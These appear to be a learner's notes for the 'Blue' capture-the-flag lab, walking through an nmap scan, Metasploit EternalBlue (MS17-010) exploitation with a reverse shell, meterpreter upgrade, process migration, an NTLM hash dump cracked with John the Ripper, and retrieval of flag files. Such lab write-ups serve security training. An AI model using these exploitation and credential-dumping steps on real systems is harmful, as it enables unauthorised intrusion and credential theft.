Blue Exploit
Recon
s1: nmap -sV -sC --script vuln -oN blue.nmap 10.10.95.33 | vulnerability scan, reports ms17-010
Exploit / Gain Access
s2: start metasploit | msfconsole
s3: search ms17-010 | select with use 0 | exploit/windows/smb/ms17_010_eternalblue
s4: show options > set RHOSTS 10.10.95.33
s5: show payloads | 55 = payload/windows/x64/shell/reverse_tcp
s6: set payload 55
s7: run | exploit succeeds when the prompt becomes C:\Windows\system32>
s8: background the shell | Ctrl + Z
Escalate
s9: upgrade shell to meterpreter = shell_to_meterpreter > use multi/manage/shell_to_meterpreter | https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/
show options > set SESSION | set session 1 > run
alternatively upgrade the session directly | sessions -u 1
run sessions to list all running sessions
sessions 2 to select session 2 (the meterpreter session)
run shell to return to the Windows command line and verify escalation > run whoami to verify you are NT AUTHORITY\SYSTEM > background the shell to return to meterpreter
s10: List all running processes with the ps command. Just because we are SYSTEM doesn't mean our process is. Find a process towards the bottom of the list that is running as NT AUTHORITY\SYSTEM and note its process id, e.g.
1292 704 spoolsv.exe x64 0 NT AUTHORITY\SYST C:\Windows\System3
s11: Migrate to this process | migrate 1292
Cracking
s12: Dump the non-default user's password and crack it!
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
s13: Crack the password Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
save the hash line into a .txt file = hash.txt
paste the hash into https://www.tunnelsup.com/hash-analyzer/ to determine the hash type or format (NTLM)
using john the ripper run the command
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt '/root/hash.txt' | password = alqfna22
Finding flags
Flag 1:
cd C:/ > cat flag1.txt
flag: flag{access_the_machine}
Flag 2:
google the windows SAM file location | c:\Windows\System32\config\flag2.txt
cd C://Windows/System32/config > cat flag2.txt OR
cat 'c:\Windows\System32\config\flag2.txt'
flag: flag{sam_database_elevated_access}
Flag 3:
Alternatively we can use the meterpreter search function to find the file location
search -f flag*.txt | c:\Users\Jon\Documents\flag3.txt
cat the file location with doubled \\ or inside ' ' | cat c:\\Users\\Jon\\Documents\\flag3.txt | cat 'c:\Users\Jon\Documents\flag3.txt'
cat flag3.txt